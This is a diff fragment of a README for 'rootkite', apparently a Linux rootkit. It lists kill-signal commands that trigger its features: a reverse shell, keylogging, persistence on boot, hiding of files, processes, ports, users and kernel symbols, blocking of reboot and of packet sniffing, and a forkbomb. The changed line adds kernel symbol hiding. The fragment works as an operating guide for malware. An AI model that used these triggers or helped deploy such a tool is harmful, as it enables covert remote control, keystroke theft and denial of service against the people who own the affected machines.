NondairyDig/rootkite/README.md

    - To activate reverse shell, execute: `kill -64 3`.
    - To activate keylogging, execute: `kill -64 4`.
    - To make rootkite rooted in the system(load always on boot) & insert conf file to hide list, execute: `kill -64 5`.
-   - To activate file/process/port/user hiding and port scan block, execute: `kill -63 1`.
+   - To activate file/process/port/user/kernel syms hiding and port scan block, execute: `kill -63 1`.
    - To start blocking system reboot, execute: `kill -63 2`.
    - To activate packet sniffing block on speciefic ports, execute: `kill -63 3`.
    - To forkbomb the system, execute: `kill -63 4`.